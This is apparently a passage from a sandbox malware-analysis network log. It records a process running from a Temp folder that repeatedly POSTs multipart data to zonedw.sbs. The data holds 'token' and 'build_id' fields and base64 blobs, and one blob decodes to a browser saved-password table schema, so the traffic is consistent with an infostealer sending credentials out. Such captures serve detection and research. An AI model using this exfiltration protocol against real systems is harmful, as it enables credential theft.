                                                                                                                                                                                                                                                2024-12-13 12:52:31 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------CJW47YMGDTRQQIMO8YUSContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------CJW47YMGDTRQQIMO8YUSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------CJW47YMGDTRQQIMO8YUSCont
                                                                                                                                                                                                                                                2024-12-13 12:52:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.449846116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZMGDJECBA1N7QIE37YCB
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ZMGDJECBA1N7QIE37YCBContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------ZMGDJECBA1N7QIE37YCBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ZMGDJECBA1N7QIE37YCBCont
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.449849116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6X4ECT0ZMOZUAAA1VSRI
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 55081
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------6X4ECT0ZMOZUAAA1VSRIContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------6X4ECT0ZMOZUAAA1VSRIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------6X4ECT0ZMOZUAAA1VSRICont
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:44 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.449857116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:46 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----58GDTJM7GVAAAIE3WBAA
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
